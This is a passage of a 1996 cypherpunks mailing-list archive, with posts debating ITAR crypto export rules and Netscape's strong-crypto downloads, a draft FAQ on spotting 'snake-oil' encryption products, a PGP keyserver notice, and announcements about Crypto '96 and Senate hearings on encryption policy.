-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Sun, 21 Jul 1996 09:20:20 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <199607200930.LAA08360@basement.replay.com>
Message-ID: <31F15D42.1CFB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> Rich Graves wrote:
>> [on hacktic]
>>> netscape-fts2-hp10.tar.gz    Fast Track Server 2.0 for HPUX10
>>> netscape-fts2-nt.exe         Fast Track Server 2.0 for WinNT
>>> netscape-hpus-30b5.tar.gz    Navigator 3.0b5 for HP-UX
>>> netscape-linux-30b5.tar.gz   Navigator 3.0b5 for Linux
>>> netscape-ssl30-src.tar.gz    SSL 3.0 source code
>>> netscape32us-30b5.exe        Navigator 3.0b5 for Win95/NT
>>
>> And thus it begins... I think it's a bad idea to provoke the TLAs
>> like this, but I suppose it's inevitable.
> 
> Why is it a bad idea? If you don't do it, you support the ITAR
> by your lack of action! Every day that you don't export strong
> crypto you assist the enemy.

Why not consider what the consequences will be?  Do you seriously
believe that this will make the government stop enforcing ITAR?  Do you
believe it will make them change the law?  No.  What it will do is make
them remove our permission to distribute this stuff.

As for your claim that not breaking the law supports it, I must remind
you that Jim Barksdale has testified before congress on several
occasions about how braindead ITAR is.  Just because we don't fight it
the way you want us to doesn't mean we support it.

>> (But doesn't anyone use Macs or Suns?)
> 
> Mac download didn't work yesterday. The download page doesn't
> say if the Solaris versions are for Sparc or Intel (they are
> different and incompatible binaries, aren't they?).

A lot of people have been downloading the Mac version.  What was the
problem you were having?  If you're not seeing the NoCookie problem,
please try again.  I think we've got most of the other problems licked.
The Solaris versions are for Sparc.

>> Besides, it's a Serious Copyright Violation, said with minimal
>> irony. This whole thing isn't Netscape's fault; in fact, they're
>> doing their best to be the good guys.
> 
> Do you Seriously Believe that Netscape would prefer foreigners
> to develop and use competing products? Of course not. They are
> probably secretly applauding the brave exporters.

You are wrong.  We are worried that our permission to provide these
products will be withdrawn.  If we could do it legally, we'd let anyone
download it who wants it.  But we can't.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sun, 21 Jul 1996 07:19:46 +0800
To: cypherpunks@toad.com>
Subject: Re: PGP Keyserver at jpunix.com
Message-ID: <Pine.NEB.3.93.960720153847.23905B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The problem with the PGP keyserver at jpunix.com has been corrected. It
turned out to be a corrupted keyring. The keyserver is once again
available via email at pgp-public-keys@jpunix.com as well as by WWW from
www.jpunix.com. The WWW interface uses Bal's PGP WWW interface. I
apologize for the downtime and the inconvenience. On the up side, I didn't
lose any key requests during the downtime. 

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfFE6lOTpEThrthvAQE3cQP/cy7x/LnmfC/31AcIgom3X2Cc/YMR01Jw
95kPt7W0JAz154DZezXLyR79Q7fJ4DYSkHRO6HFGwd5QiCkHrUjv/xweECPf9Q4s
x41VnTFxrXGr3+YTm47vL+gBnuVmSTP4ujMC9s6r2zcGOCE3jQXKBLEhGNB6kPxg
ab37bM4iGHo=
=oONb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 21 Jul 1996 08:06:13 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960720183720.00de3c00@mail.teleport.com>
Message-ID: <199607202049.PAA09452@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Alan Olsen wrote:
> There is a time and space dilation when the gun is pointed directly at you
> and about to be fired.  (Been there, done that...)  Perception tends to be
> skewed when all of the adrenaline is pumping into your bloodstream because
> of a perceived impending death.
> 
> Believe me, it does look big.  A 12 gauge especially...  (Had a brother who
> came close to shooting me because he thought I was a burglar.  Not fun.)

I am very curious how it happened.

Thanks,

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Jul 1996 06:37:18 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <1.5.4.32.19960720185045.0031750c@giasdl01.vsnl.net.in>
Message-ID: <199607202011.QAA07854@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Arun Mehta writes:
> >It may sound "stupid" to you...I suggest you read up on evolutionary game
> >theory. Sometimes one has no choice but to respond to an arms buildup.
> >Unilateral disarmament rarely works.
> 
> There are surely alternatives to the extremes of unilateral
> disarmament and an arms race? For instance, slowing down  the
> race?

Don't ask the question as though it is theoretical. Don't try
answering it as though your personal values have any bearing, because
there is indeed an objective answer here. Try doing some game theory
simulations and see how well unilateral disarmament works.

Oh, and don't give us stuff about how humans are above evolutionary
pressures or nonsense like that, because we aren't any more above such
pressures than we are above the laws of physics.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 21 Jul 1996 07:21:54 +0800
To: cypherpunks@toad.com
Subject: A Snake-Oil FAQ
Message-ID: <199607202058.QAA19736@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



I've written a short "Snake Oil FAQ" below.  It's incomplete and 
needs some work (adding a few definitions, rewording, aesthetic 
formatting, etc.), so think of it as a 'beta' FAQ (please don't post 
it on web pages, though I don't mind if it's distributed among 
anyone interested in criticizing or contributing).   Comments and
suggestions would be appreciated.   Note that the aim is to write
something  accessible to 'newbies'.  (Jeremy Barrett contributed to
this, BTW)


                          Snake-Oil Warning Signs
                        Encryption Software to Avoid

                              (Revision 0.1)


Introduction

======================================================================
Good cryptography is an excellent and necessary tool for almost 
anyone.
However, there are a multitude of choices for what products to use. 
Many good cryptographic products are available, both commercial and free.  However there are also some extremely bad cryptographic 
products (known in the field as "Snake Oil"), which not only fail do 
their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptogra
phy and security.

It is extremely important that users of cryptography actively 
question the product they are considering using, to insure the security and integrity of their data-- be it personal or business informat
ion.  In order to make a more informed decision, it is necessary to 
understand
some of the "red flags" to watch out for, and what they mean.

For a variety of reasons, this document is general in scope and does 
not mention specific products or algorithms as being "good" or "Snake Oil".

Some Common Snake-Oil Warning Signs

======================================================================
The following are some of the "red flags" one should watch for when 
looking at an encryption product:

Technobabble
------------
The vendor's descrption of the product may contain a lot of
hard-to-follow use of technical terms to describe how the product
works.  If this appears to be confusing nonsesense, it may very well
be (even to someone familiar with the terminology).  Technobabble is 
a
good means of confusing a potential user and masking the fact that 
the
vendor doesn't understand anything either.

A sign of technobabble is a descrption which drops a lot of technical
terms for how the system works without actually explaining how it
works.

New Type of Cryptography?
-------------------------
Beware of any vendor who claims to have invented a "new type of
cryptography".

Avoid software which claims to use 'new paradigms' of computing such
as cellular automata, neural nets, genetic algorithms, chaos theory,
etc.  Just because software uses to different mehtod of computation
doesn't make it more secure.

Anything that claims to have invented a new public key cryptosystem
without publishing the details or underlying mathematical principles
is highly suspect.

Proprietary Algorithms
----------------------
Avoid software which uses "proprietary" or "secret" algorithms.
Security through obscurity is not considered a safe means of
protecting your data.  If the vendor does not feel confident that the
method used can withstand years of scrutiny by the academic 
community,
neither should you.

Beware of specially modified versions of well-known algorithms.  This
may unintentionally weaken the cipher.

The use of a trusted algorithm, along with technical notes explaining
the implementation (if not availablity of the source code for the
product) are a sign of good faith on the part of the vendor that you
can take apart and test the implementation yourself.


Old Ciphers Never Die...
------------------------
Beware of something that sounds like a sophisticated nineteenth-
century or even World War II scheme, or something based on a
mechanical system.

If the product's authors sound like they are entirely unfamiliar
with the state of the art, that's a good warning sign.

Experienced Security Experts
----------------------------
Beware of any product claiming that "experienced security experts"
have analyzed it, but it won't say who (especially if the scheme has
not been published in a reputable journal).

Unbreakability
--------------
Some vendors will claim their software is "unbreakable".  This is
marketing hype, and a common sign of snake-oil. Avoid any vendor that
makes unrealistic claims.

No algorithm is unbreakable.  Even the best algorithms are breakable
using "brute force" (trying every possible key), but if the key size
is large enough, this is impractical even with vast amounts of
computing power.

Be wary of marketing gimmicks related to "if you can crack our
software" contests.  

One-Time-Pads
-------------
A snake-oil vendor may claim the system uses a one-time-pad (OTP),
which is theoretically unbreakable.

A OTP system is not an algorithm.  It involves generating a random 
key
at least the size of the message and garbling the message with it. 
When the message is decrypted, the key is destroyed.  Only one 
message
is encrypted with a OTP, and it is used only once.  They key is
random: generated using a real random source, such as specialized
hardware, radioctive decay timings, etc., and not from an algorithm 
or
cipher.  Anything else is not a one-time-pad.

The vendor may confuse random session keys or initialization vectors
with OTPs.

Algorithm or product XXX is insecure
------------------------------------
Avoid anything that makes claims that particular algorithms or
other products are insecure without backing up those claims (or at
least siting references to them).

Avoid anything that misrepresents 'weaknesses' of other algorithms.
(For example, if the product claims it doesn't use public key crypto,
citing timing attacks or factoring as reasons.)

Keys and Passwords
------------------
The "key" and the "password" are often not the same thing.  The "key" 
generally refers to the actual data used by the cipher algorithm.  The "password" refers to the word or phrase the user types in,
 which the software converts into the key (usually through a process 
called "hashing" or "key initialization").

The reason this is done is because the characters a user is likely to 
type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to gues
s.)  By hashing a key can be made from an arbitrary password that 
covers the full range of possible keys.  It also allows one to use longer words, or phrases and whole sentences as a "passphrase", wh
ich is more secure.

Anything that restricts users passwords to something like 10 or 16 or 
even 32 characters is foolish.  If the actual "password" is the cipher's key (rather than hashing it into a key, as explained abo
ve), avoid it.

Anything that claims to solve the "key management problem" is also
be to avoided.  (Key management is an inherent problem with crypto.)
Convenience is nice, but be wary of anything that sounds too easy
to use.  Avoid anything that lets anyone with your copy of the 
software to access files, data, etc. without having to use some sort of key
or passphrase.

Avoid anything that doesn't let you generate your own keys (ie,
the vendor sends you a key in the mail).

Avoid anything by a vendor who does not seem to understand the 
difference between public-key cryptography and private-key cryptography.

Lost keys and passwords
-----------------------
If there's a third-party utility that can crack the software, avoid
it.  If the vendor claims it can recover lost passwords (without
using a key-backup or escrow feature), avoid it.

Exported from the USA
---------------------
If the software is made in North America, can it be exported?  If the
answer is yes, chances are it's not very strong.  Strong cryptography
is considered munitions in terms of export from the United States, 
and
requires approval from the State Department.  Chances are if the 
software is exportable, the algorithm is weak or it is crackable (hence it was approved for export).

If the vendor is unaware of export restrictions, avoid the software:
the vendor is not familiar with the state of the art.

Because of export restrictions, some legitimate (not-Snake Oil) 
products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution.  



---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 20 Jul 1996 18:00:29 +0800
To: cypherpunks@toad.com
Subject: Re: Making encoding out of an authentication cipher
Message-ID: <199607200530.RAA17573@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Green alien space slime made ogren@cris.com ("David F. Ogren") write:
 
>1. It is slow.  This method would appear to be approximately the speed of 
>MDC.  And MDC (using SHA, what appears to be the most secure hash) is (very 
>roughly) 5 times slower than Blowfish and 3 times slower than IDEA.  And 
>although MDC is faster than 3DES in software, 3DES could easily outpace MDC 
>in hardware.
 
It depends.  On a PC (the most common type of computer hardware) you're 
limited by the bus speed.  Most encryption cards are still ISA (so far I've 
managed to find a single PCI DES card, everyone is still shipping ISA cards 
because they're the lowest common denominator).  This means that even with a 
15 MB/sec DES chip you can't get more than 1 MB/sec throughput.  I think the 
breakeven point for MDC/SHA vs the ISA bus is either a P5/90 or a P5/100 (I 
don't have access to either of them to check this right now).  This isn't just 
for MDC, virtually anything on any recent PC is faster than the ISA bus (in 
fact from Eric Youngs libdes figures there are CPU's which will do software 
3DES faster than hardware 3DES on an ISA bus).
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 21 Jul 1996 08:46:45 +0800
To: JonWienk@ix.netcom.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607202002.NAA17000@dfw-ix1.ix.netcom.com>
Message-ID: <199607202231.RAA09968@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


JonWienk@ix.netcom.com wrote:
> 
> P.S. Chesnokov = Chudov = Vulis = Sternlight = Detweiler
> 

That's an interesting equation.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Terka" <werewolf@io.org>
Date: Mon, 22 Jul 1996 08:10:31 +0800
To: "Cypherpunk Remailing List" <cypherpunks@toad.com>
Subject: Does JPUNIX  Remailer Have a Help File?
Message-ID: <199607212155.RAA19549@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anybody know if the nym server at jpunix has a help file that can be
requested?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfEaEXBFBj7pSNyhAQG4Xwf9HKUs8yu2pWZ0OxVP6MZb8jn2DXNezELi
UUbrKlmT2eAUv/MqFE3phprXn5dJC5n7BGRX72s/4tzJ87NhY6sF/w2pMKVWcbih
gZTpEYFdP8RoJpK5fQ5rBUnOjWhx8YAgeF7/m8te4VKK787lilVmMgFZLnCHOVWs
NqxiHP2A3fcQSZIAwKXIwj7Fay8KWMT7a1Q5y96SHUUez1Mnp45d41+2C17QbQZS
wMXs4J/PN5eX5mkQXo/kRFgSWzi/GDLRWozBDZhZE9X3PIMoIflDkEoPwzWOIoCw
L4fn1FRochUmaQseG1QwbC44H5eDd1i8VJhN/y2UecAEK5EDm8V1aQ==
=YqA0
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 21 Jul 1996 08:46:08 +0800
To: cypherpunks@toad.com
Subject: Re: MIT harassed over publication of PGP book
Message-ID: <2.2.32.19960720220935.0086d2c0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 AM 7/10/96 EDT, Hal Abelson wrote:
>
>Now, we learn of a back channel communication from State to DOE to
>Sandia, which has prompted Sandia to want to act as a policeman for
>MIT vis a vis export controls.
>
>This is troubling for what it says about how the State Department is
>dealing with export issues surrounding information about cryptography,
>and about the extent to which policies are being administered in a
>clear and above-board manner.

A blue ribbon panel of Ivy League administrators warned in the mid 1950s
that Universities which accepted public funds would lose their independence
and become mere functionaries of the federal government.  They were right
and you all had fair warning.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jul 1996 12:46:49 +0800
To: Tom Weinstein <cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <199607210113.SAA05824@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:

>> Do you Seriously Believe that Netscape would prefer foreigners
>> to develop and use competing products? Of course not. They are
>> probably secretly applauding the brave exporters.
>
>You are wrong.  We are worried that our permission to provide these
>products will be withdrawn. 

As far as I can tell, you need no "permission" to "provide these products", 
at least domestically.  The only restrictions that have been implied have 
been over the delivery of encryption over the 'net, and even that is 
questionable.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Sun, 21 Jul 1996 09:58:02 +0800
To: Joseph Seanor <cypherpunks@toad.com
Subject: Re: Viacrypt PGP version 4.0
Message-ID: <2.2.32.19960720234134.006b5fd8@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:46 PM 7/20/96 -0700, you wrote:
>On Fri, 19 Jul 1996, Erle Greer wrote:
>
>> Is there a free/trial/steal/shareware version of Viacrypt PGP Personal
>> version 4.0, rather than forking over $129.00?
>> 
>My company sells it for $100, if you want the full version with the book 
>and everything.
>
>Joseph Seanor
>

That sounds like an excellent deal when I plan to purchase it, but I would
like to see if there is a crippleware demo first.  I already have had 2.6.2
configured with a Windows clipboard utility.  I just want to see if the full
Win/integrated clipboard feature is more efficient.  Thanks Joseph!
P.S. I am also erleg@sdinter.net, but Majordomo won't unsubscribe me because
I don't seem to be on the 'who cypherpunks' list, but my old address is
still mysteriously reeiving the list.  Any hints?  Yes, I wrote
owner-cypherpunks with no reply.  TIA!

      /---\       |=================================================|
     / /\/ \      |If a train station is where a train stops        |
     \ \   /      |then what is a workstation?                      |
      \ \ /       |-------------------------------------------------|
   /\  |/|  /\    |I am not saying that there are no gods;          |
  /  \ |\| /  \   |just that I haven't had the pleasure to meet one.|
 /    \|/|/    \  |-------------------------------------------------|
--------\-------- |Disclaimer: My opinions never reflect that of my |
        /         |employer.                                        |
        \         |=================================================|
        v         |Please CC: responses via E-Mail; I seldom check  |
                  |the newsgroups for responses.                    |
                  |=================================================|
                  | mailto:vagab0nd@sd.cybernex.net                 |
                  | http://ww2.sd.cybernex.net/~vagab0nd/index.html |
                  | If you think my Sig is big...                   |
                  |=================================================|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 21 Jul 1996 12:06:36 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <31F18C75.2A4C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <31EF632D.2B88@netscape.com>,
> Jeff Weinstein  <jsw@netscape.com> wrote:
> >Roy M. Silvernail wrote:
> >> Anyone sniffing the link
> >> knows the filename from previous forms submissions, anyway.
> >
> >  You can't sniff the link, since the form submission and the
> >file download are via SSL.
> >
> But assumedly if they're downloading the 128-bit netscape, then they're
> only using the 40-bit version to do it... :-)

  Well yes, the first time they do it.  But the many times they download
new versions, from now until the end of time, they can use 128-bit SSL.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 21 Jul 1996 12:10:42 +0800
To: cypherpunks@toad.com
Subject: Crypto '96 reminder -- register if you haven't!
Message-ID: <199607210211.TAA26264@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


If you haven't already registered for Crypto '96, you're late!  But
there's probably still time.  They no longer guarantee that they will
have space for you, but if they do, you'll get in.

See http://www.iacr.org for details.  It costs about $640 plus plane
fare to attend ($420 conference registration, $220 for dorm space and
meals).  Plus transportation there and back.  It's in a beautiful
location at UC Santa Barbara, right next to the beach.  The weather,
food, and discussions are always good, and it's a great way to meet
good cryptographers and discuss the future privacy and security of the
world.  If the papers look too complicated for you, relax; they're
cryptic for academic bureacratic reasons.  The actual presentations by
their authors are quite well explained, and are often lively and
entertaining.

If you're doing something interesting with crypto, submit a note for
the "rump session", short informal talks about work in progress, which
will happen on Tuesday evening during the conference.  I hope to be
speaking there about my latest crypto projects.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EVERHART@Arisia.GCE.Com
Date: Sun, 21 Jul 1996 09:28:08 +0800
To: cypherpunks@toad.com
Subject: Info War
Message-ID: <960720191512.94@Arisia.GCE.Com>
MIME-Version: 1.0
Content-Type: text/plain


If the government should happen to be serious about wanting to prevent
some possible info war scenarios, one might expect a number of things
to be seen.

* I'd expect that there would be at least some statements about the
unwisdom of standardizing on MS operating systems or unix versions
which have little or no security, building an infrastructure with security
holes one can drive a truck through.

* I'd also expect that the anti-crypto campaign to be at least scaled WAY
down, so as to encourage more open use of crypto components in security
solutions. (Crypto won't help if your OS comes with a backdoor that allows
anyone on the Internet to get r/w access to your disks...this has been
reported to me in all Microsoft OSs they currently have, though with NT
it's under certain common but not completely ubiquitous circumstances. The
others are wide WIDE open. Other bugs doubtless exist.

* I'd expect some comments on the automatic running of downloaded images
and how to secure them. Java? Reported at Princeton to be totally 
unsecurable....no models exist. I believe you can run the thing securely,
but by having some security in its environment., I'd expect a lot more
about what is needed, and where it can be found, encouraging development
of such features.

If on the other hand this is a ploy to justify violating people's privacy
and in fact is not concerned with improving our posture, I would expect
more Clipper chips, etc., and nothing seriously beneficial. (I consider
that freedom of speech & the press means that I can choose not only what
to say, but how to say it. If I use a language (crypto) that is hard
for some not spoken to to understand, I regard this as an essential part
of the freedom. Last I looked, this is still written.

(BTW, if you think that the Supreme Court is supposed to be the
arbiter of constitutionality, your reading of Marbury vs. Madison
is seriously flawed. Congress and the President (& other federal
employees) take an oath of office and are supposed to be deciding
that what they do is Constitutional before doing it. Alas that
they generally don't take this seriously...)

We'll see what actually happens. I'd like to hope for the real effort
to avoid problems. I fear we will get the bogus one, suitable for control
freaks but not useful ultimately in dealing with the threats.

Glenn Everhart




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Sun, 21 Jul 1996 09:32:15 +0800
To: cypherpunks@toad.com
Subject: INFO: Submit your testimony to Congress for hearings on July 25!
Message-ID: <199607202316.TAA25104@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

	    Virtually attend the upcoming hearings on July 25, 1996

			   Submit your own testimony
			Listen to the RealAudio cybercast
			 Ask Louis Freeh a question (FBI)

                              Date: July 20, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        Upcoming hearing information
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
UPCOMING HEARING INFORMATION

The Senate Commerce committee will be holding hearings on the Burns/Leahy
Pro-CODE bill (S.1726) this Thursday July 25, 1996 in Washington D.C.

Like most everyone that doesn't live in Washington, you can't be there
in the flesh.  But you can be there virtually through www.crypto.com!

A RealAudio cybercast of the hearing is being coordinated by Jonah Seiger
(CDT).  If you have the RealAudio software (it's free from www.realaudio.com)
you can listen to the hearing live.  You can also telnet into the chat room
and pose questions to the staffers who will be online.

If you wish to make your voice heard, take a moment and submit your own
written testimony through the web page at http://www.crypto.com.  When
you submit your testimony, you can also submit a question for FBI Director
Louis Freeh who is scheduled to testify.  We'll provide a copy of the
questions to the committee members, and urge them to pin down Director 
Freeh on some of the finer points of the issue.

This is an amazing time for democracy.  Never before have American citizens
been able to have so much representation in the halls of Congress without
actually being physically there.  Don't let this debate go on without your
input!

A complete profile of the cybercast and the net-presence effort is available
at http://www.crypto.com/ until the hearing, and at
http://www.crypto.com/events/ after that.

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.  To unsubscribe, send a letter to majordomo@panix.com with
"unsubscribe crypto-news" in the body.
-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Sun, 21 Jul 1996 10:04:24 +0800
To: cypherpunks@toad.com
Subject: ITAR's 40 bit limit
Message-ID: <199607202345.TAA01019@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Jul 20 19:41:41 1996

Another paradox of the US export regulations.

The NSA is allowing 40 bit crypto exports.  So as a hypothetical example 
assume that I write a crypto program that uses 40 bit RC4 to encode data 
(licensing from RSA).  I then get an export license using the accelerated 
process for 40 bit RC4.

I then export my program to Alice who wants to use it to transmit messages 
to Bob.

If she uses my program to encrypt messages to Bob, any reasonably powerful 
attacker can decrypt her messages.

However, what if she runs the program three times with three different 
passwords.  (Ignore the problems of Inner-CBC and Outer-CBC for now.)  Now 
the file is triple RC4 encoded with the equivalent of 80 bit security.  
Alice and Bob now have strong crypto.  And if they run the program five 
times they have 120 bits of effective protection.

The problem of using Inner-CBC is a little tricky, but if we assume that I 
can export in a DLL format, a Windows program could be written that calls 
the DLL repeatedly to layer it into triple or pentuple CBC RC4.

The entire above discussion is entirely theoretical.  I realize that it's a 
moot point since strong crypto is already perfectly accessible outside of 
the US.  And that strong crypto algorithms can be exported in non-machine 
readable format (another paradox).  (And that running 5-layer RC4 is a 
really inefficient block cipher.)

I just wanted to point out yet another reason why ITAR regulations over 
crypto are not effectively preventing strong crypto.  They are merely 
making it difficult for American business.

- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfFutuSLhCBkWOspAQFH7gf9GDjh1tcktyx3Lo4iSxDFTFoB7fuuJO0l
SNlkYH1Akchl02b/CWc6CDSAZ8hxoUfoZpqTD7U0xTs1QqOM7y45r1/RvAet870s
mkWL7gS5RmiiGN1bgtm844RPAtAhaE0uzT6wJsPQSfAv94CvZGNJEtF2p5lASs2F
fK50gmlSbjhhHoh85s/7Ugl7XzTmRGoZzdKQCGpkc6yTJu/aKDyWU3HVSEY9F4Y3
AaHkardJehv/9xqoxks5eqnwjTSJ8+cAptT1iBo6hW+CKv89wQKK/F8RbQb2FWL2
z4GqFfQHdbxVbnspDNtIRUP5qhJuFRhmuS/ARfTYgTN50Gm5g/Cz2w==
=2k+F
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Sun, 21 Jul 1996 13:29:40 +0800
To: Jerome Tan <cypherpunks@toad.com>
Subject: Re: Firewall Penetration
In-Reply-To: <01BB75F4.8F028E40@ip160.i-manila.com.ph>
Message-ID: <9607202018.TE16841@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 19, 17:29, Jerome Tan wrote:
> Subject: Firewall Penetration
> Is it possible to penetrate a firewall?

You could try breaking in to the room the firewall is in. Once in the 
room, simply rewire the network to bypass the firewall. 

Be sure that you arrive in the room well equipped. You might want to 
have a spare router or two, some cables, tools, and hubs, and perhaps 
something to do address translation. 


-- 
Mark Henderson -- mch@squirrel.com, henderso@netcom.com, markh@wimsey.bc.ca
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Sun, 21 Jul 1996 12:07:46 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: Opiated file systems
In-Reply-To: <4srl21$2rr@abraham.cs.berkeley.edu>
Message-ID: <199607210142.UAA07778@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> In article <199607182213.RAA10532@pentagon.io.com>,
> Douglas R. Floyd <dfloyd@IO.COM> wrote:
> >If someone has any ideas on how to slow down attacks like this, please
> >E-mail me.  It would be nice to have an offsite storage place, but without
> >the necessity of giving a bunch of personal info (as with Mcaffee's
> >WebStor).
> 
> Charge ecash?
> 
>    - Ian

Nice idea, but the purpose of this is to make a reliable reference
implementation.  I will worry about charging after there are reliable
OSSS's in existance.

Footnote:  I cannot call this site once it is constructed a data haven due
to the fact that it has no armor (read that its physical location can be
found out).  That is why I tend to call it an offsite secure storage
server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Jul 1996 06:59:17 +0800
To: cypherpunks@toad.com
Subject: Curfews again
Message-ID: <ae168b6502021004a821@[205.199.118.202]>
MIME-Version: 1.0
